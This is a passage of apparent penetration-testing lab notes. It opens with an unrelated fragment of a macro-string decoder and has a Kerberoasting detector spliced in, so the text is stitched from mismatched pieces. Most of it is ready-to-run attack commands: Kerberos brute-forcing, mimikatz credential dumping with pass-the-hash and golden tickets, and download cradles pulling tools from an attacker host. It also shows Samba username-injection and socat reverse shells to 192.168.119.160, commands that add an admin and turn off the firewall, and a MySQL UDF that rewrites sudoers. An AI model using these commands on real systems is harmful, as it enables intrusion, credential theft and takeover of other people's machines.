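        chunk = chunk[: len(chunk) - len(chunk) % 4]   # drop the ragged tail
        if not chunk:
            continue
        raw = base64.b64decode(chunk)
        for phase in range(2):                 # unknown UTF-16 byte phase
            body = raw[phase:]
            body = body[: len(body) - len(body) % 2]
            text = body.decode("utf-16-le", errors="replace")
            if text and all(ch in PRINTABLE for ch in text):
                results.append(text)
    return results


def recover_command(vba_source):
    """Return the longest readable decoding of the macro's string, or None."""
    candidates = decode_candidates(join_chunks(vba_source))
    return max(candidates, key=len) if candidates else None


def flag_markers(text):
    """Names of the MARKERS present in the recovered command, sorted."""
    return sorted(name for name, needle in MARKERS.items() if needle in text)


if __name__ == "__main__":
    command = recover_command(SAMPLE_VBA)
    print(command)
    print(flag_markers(command))
```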
Kerberos
- Installation steps -
1. Install Go
https://golang.org/doc/install
> download, extract, and add it to PATH
# rm -rf /usr/local/go && tar -C /usr/local -xzf go1.16.4.linux-amd64.tar.gz
# export PATH=$PATH:/usr/local/go/bin
# echo $PATH
# go version
2. Install kerbrute
https://github.com/ropnop/kerbrute/releases/tag/v1.0.3 > download the source code and unzip it, then
# unzip kerbrute-1.0.3.zip
# cd kerbrute-1.0.3
# make help
# make all
# cd dist
3. Run the commands
userenum
# ./kerbrute_linux_amd64 userenum --domain svcorp.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.11.1.20
Find ID:password pairs
# ./kerbrute_linux_amd64 bruteuser --domain svcorp.com /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt users.txt --dc 10.11.1.20
Active Directory
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
+++++++++++++++ Searching with net.exe ++++++++++++++++++
1. Enumerate all local accounts by using the 'net user' sub-command
C:\>net user
2. Enumerate all users and all groups in the entire domain.
C:\>net user /domain
C:\>net group /domain
3. Query users to find who is in Domain Admins group
C:\>net user ralph /domain
+++++++++++++++++ Searching with PowerShell ++++++++++++++++++++++++
LDAP ('Lightweight Directory Access Protocol') is an Active Directory Service Interfaces (ADSI) provider.
DN = DistinguishedName
DC = Domain Components
1. Discover hostname of the domain controller and the components of the DistinguishedName.
PS C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
2. Enumerate all users
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}
3. Enumerate domain groups
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(objectClass=Group)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    $obj.Properties.name
}
4. Enumerate group members
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(name=Domain Admins)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    $obj.Properties.member
}
5. Detect Service principal names
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}
nslookup <host from the found servicePrincipalName>
6. mimikatz (https://tggg23.tistory.com/36)
# privilege::debug
# sekurlsa::logonpasswords
If the password comes back as null:
regedit > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > SecurityProviders >
WDigest > New (DWORD UseLogonCredential; if the value is 0, change it to 1)
# sekurlsa::pth /user:Administrator /domain:SVCLIENT08 /ntlm:ee0c207898a5bccc01f38
# token::elevate
# token::list
# lsadump::sam
# lsadump::secrets
# sekurlsa::tickets
# kerberos::golden /user:alice /domain:svcorp.com /sid:S-1-5-21-466546139-763938477-1796994327-1103 /target:HP3service.svcorp.com /service:HTTP
7. Find IPs and passwords with winPEAS https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/mimikatz.exe', 'c:\Users\Public\mimi.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/winPEASany.exe', 'c:\Users\Public\winp.exe')
for user in $(cat users.txt); do c*****r -b *** -s IP -u $user -C /passwords.txt -n 1; done
UAC(User account control) bypass (p540)
psexec from impacket
LDAP 385
SMB 445
RDP 3389
smbclient
$ smbclient --list //10.11.1.136/ -U ""
$ smbclient //10.11.1.136/'Bob Share'/ -U ""
$ smbclient //10.11.1.136/'Bob share' --option='client min protocol=NT1' -U "./= nohup nc -e /bin/sh 192.168.119.160 443"
$ smbclient //10.11.1.136/'Bob share' -U "/=`nohup mkfifo /tmp/f; nc 192.168.119.160 443 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f` "
smb version check
$ sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
$ smbclient -L //10.11.1.146/SusieShare -U ""
https://hackmag.com/security/htb-kerberos/
$ hydra -L users.txt -P passs.txt smb://10.11.1.21 -t 4
$ hydra -L username.txt -P password.txt 10.11.1.21 smb -V
$ sudo nmap -n --script safe -p 445 10.11.1.21
$ rdesktop -u SVCORP\\USERNAME -p PASSWORD 10.11.1.20
$ crowbar -b rdp -S server.txt -U users.txt -C passs.txt -n 1
Banner Grab
Tab 1
$ sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
Tab 2
$ smbclient -L \\10.11.1.115
$ sudo smbmap -H 10.11.1.115 -P 139
$ smbclient -N -L 10.11.1.11
$ smbclient -N "\\10.11.1.11\file"
smb:> dir
smb:> recurse ON
smb:> prompt OFF
smb:> mget *
++++++++++ Windows SMB +++++++++++++++++++++++++
$ sudo smbmap -u anonymous -p password -d -H 10.11.1.31 > list the shares and their permissions
$ smbclient \\\\10.11.1.20\\Public password
$ smbclient \\\\10.11.1.31\\wwwroot password > SMB access works
++++++++ Accessing MSSQL +++++++++++++++++++
$ /home/OS-94404/.local/bin/mssqlclient.py -p 1433 sa@10.11.1.31 -windows-auth
$ /home/OS-94404/.local/bin/mssqlclient.py RALPH\ralph:poiuytrewq@10.11.1.31 -windows-auth
(https://alamot.github.io/mssql_shell/)
$ sqsh
SQL command collection
https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/
Creating a writable folder on Windows
fsutil usage
https://www.windows-commandline.com/create-empty-file/
batat.exe
service_exec(conn, r'cmd /c net user OS-94404 pass /add')
service_exec(conn, r'cmd /c net localgroup administrators OS-94404 /add')
service_exec(conn, r'cmd /c netsh firewall set opmode disable')
service_exec(conn, r'cmd /c netsh advfirewall set allprofiles off')
smb_send_file(smbConn, '/home/OS-94404/labs/75/shell.exe', 'C', '/shell.exe')
service_exec(conn, r'cmd /c c:\shell.exe')
ldap enum
# nmap -sT -Pn -n --open 192.168.73.20 -p389 --script ldap-rootdse
jQuery File Upload vulnerability
$ curl -F "files=@reverse.php" http://10.11.1.123/books/apps/jquery-file-upload/server/php/index.php
Kerberoasting Attack Synopsis
1. Scan AD for user accounts with SPN values set.
2. Once a list of target accounts is obtained, request service tickets from AD using the SPN values.
3. Using Mimikatz, extract the service tickets to memory and save them to a file.
4. Once the tickets are saved to disk, pass them into a password cracking script that runs a dictionary of passwords as NTLM hashes against the extracted service tickets until it successfully opens a ticket. When the ticket file is finally opened, the service account password is presented in clear text.
Method 1)
1) Get Users with SPNs
GetUserSPNs.ps1
2) Get Service Tickets (check the NetBIOS computer name from nmap to know which server's ticket you are extracting)
ps> Add-Type -AssemblyName System.IdentityModel
ps> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQL....."
3) Extract Tickets
mimikatz # kerberos::list /export
4) Crack Tickets
They are binary files, so be careful when transferring them;
extract the base64-form hash with kirbi2hashcat.py, then
$ hashcat -m 13100 hashes.txt wordlists.txt --force
Method 2) the easy version
https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
Extract the hashes in ASCII form with Invoke-Kerberoast.ps1 and save them to a txt file.
Since there is no constraint on the transfer mode, they can be sent with nc.
On the compromised server:
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.119.160/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
After moving it to the attacking machine:
$ hashcat -m 13100 Kerb-Hash0.txt /usr/share/wordlists/rockyou.txt --force
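The defender's side of the procedure above, as an added example that is not from the original post: a Python detector over constructed Security log 4769 events that flags accounts requesting RC4 (0x17) service tickets for many distinct SPNs within a short window, which is the trace the enumerate-then-request-all steps leave on the domain controller.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security log 4769 (A Kerberos service ticket was requested)
# events, reduced to the fields the detection needs:
# (time, Account Name, Service Name, Ticket Encryption Type, Client Address).
SAMPLE_4769 = [
    ("2021-05-10 09:00:01", "alice@SVCORP.COM", "SV-DC01$",   "0x12", "10.11.1.22"),
    ("2021-05-10 09:00:02", "alice@SVCORP.COM", "svc_sql",    "0x17", "10.11.1.22"),
    ("2021-05-10 09:00:02", "alice@SVCORP.COM", "svc_http",   "0x17", "10.11.1.22"),
    ("2021-05-10 09:00:03", "alice@SVCORP.COM", "svc_backup", "0x17", "10.11.1.22"),
    ("2021-05-10 09:00:03", "alice@SVCORP.COM", "svc_iis",    "0x17", "10.11.1.22"),
    ("2021-05-10 09:00:04", "alice@SVCORP.COM", "svc_ldap",   "0x17", "10.11.1.22"),
    ("2021-05-10 09:30:00", "bob@SVCORP.COM",   "svc_sql",    "0x17", "10.11.1.30"),
    ("2021-05-10 11:15:00", "bob@SVCORP.COM",   "svc_http",   "0x17", "10.11.1.30"),
    ("2021-05-10 11:15:01", "carol@SVCORP.COM", "SV-DC01$",   "0x12", "10.11.1.45"),
]

# RC4-HMAC tickets are keyed by the service account's NT hash, which is why the
# hashcat mode above (13100) exists and why the tooling asks for this etype.
RC4_HMAC = "0x17"


def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_distinct=4):
    """Return {account: {"spns": [...], "clients": [...]}} for every account that
    requested RC4 service tickets for at least min_distinct different user-owned
    SPNs inside any window-long span. Normal users touch one or two services;
    the synopsis above requests a ticket for every SPN found."""
    per_account = defaultdict(list)
    for ts, account, service, etype, client in events:
        if etype.lower() != RC4_HMAC:
            continue
        if service.endswith("$"):   # machine accounts: long random passwords, not targets
            continue
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        per_account[account].append((when, service, client))

    alerts = {}
    for account, requests in per_account.items():
        requests.sort()
        for i, (start, _, _) in enumerate(requests):
            spns = {svc for when, svc, _ in requests[i:] if when - start <= window}
            if len(spns) >= min_distinct:
                alerts[account] = {
                    "spns": sorted(spns),
                    "clients": sorted({client for _, _, client in requests}),
                }
                break
    return alerts


if __name__ == "__main__":
    for account, detail in find_kerberoast_bursts(SAMPLE_4769).items():
        print("possible Kerberoasting by %s from %s: %s"
              % (account, ", ".join(detail["clients"]), ", ".join(detail["spns"])))
```

Service accounts that only support AES (msDS-SupportedEncryptionTypes) make the 0x17 filter alone insufficient, so on such domains drop the etype check and rely on the burst of distinct SPNs.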
su: must be run from a terminal
When the tty problem has to be fixed but Python is not available either,
solve it with socat.
Kali
$ sudo socat file:`tty`,raw,echo=0 tcp-listen:444
Target
$ ./socat tcp-connect:192.168.119.160:444 exec:/bin/bash,pty,stderr,setsid,sigint,sane
- Miscellaneous Windows tips -
1. Enable RDP
C:\WINDOWS\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2. File transfer using TFTP
$ sudo systemctl start tftpd-hpa
c:> tftp -i 192.168.119.160 PUT/GET file
3. dump hashes
c:> reg save HKLM\SAM c:\SAM
c:> reg save HKLM\System c:\System
After sending them to Kali:
$ samdump2 System SAM
c:> fgdump.exe
Password-protected zip file
$ fcrackzip file.zip
- MYSQL -
Find the MySQL password
$ cd /var/www/
$ grep -rl "password" *
46249.py
> grab the shellcode that matches the kernel
$ mysql -u root -p
mysql> set @shell = 0x. SNIP...;
mysql> select binary @shell into dumpfile '/home/j0hn/fire.so';
mysql> select binary @shell into dumpfile '/usr/lib/fire.so';
mysql> select binary @shell into dumpfile '/usr/lib/mysql/fire.so';
mysql> create function sys_exec returns int soname 'fire.so';
mysql> select * from mysql.func where name='sys_exec';
mysql> select sys_exec('echo "j0hn ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
Kernel 2.6 ssh restart command
# /etc/rc.d/init.d/sshd restart